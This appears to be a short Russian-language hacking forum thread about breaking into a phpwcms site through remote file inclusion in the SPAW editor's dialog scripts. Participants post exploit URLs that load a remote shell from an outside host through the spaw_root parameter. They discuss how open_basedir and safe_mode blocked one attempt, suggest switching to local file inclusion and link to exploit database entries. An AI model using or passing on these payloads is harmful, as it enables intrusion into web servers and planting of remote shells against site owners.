версия ? RFI http://www.site.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.evalsite.com/shell.php?
Хз как её узнать,но там стоит open_basedir и safe_mod =_=.Как раз этот метод пробывал недавно,и бэйздира меня спалила)( Версия РНР - 4.3.10-22 Can`t include external file пишет =_=.А стоит allow_url_fopen() =_=
Так ищи локальный инклуд, удаленный вообще редко где прокатывает http://milw0rm.com/exploits/2758 http://milw0rm.com/exploits/2163
http://site.com/nclude/inc_ext/spaw/dialogs/img.php Вывелось Image Properties (http://milw0rm.com/exploits/2163) К чему это ? spaw_root переменной вообще нету ))) как тут: PoC: http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?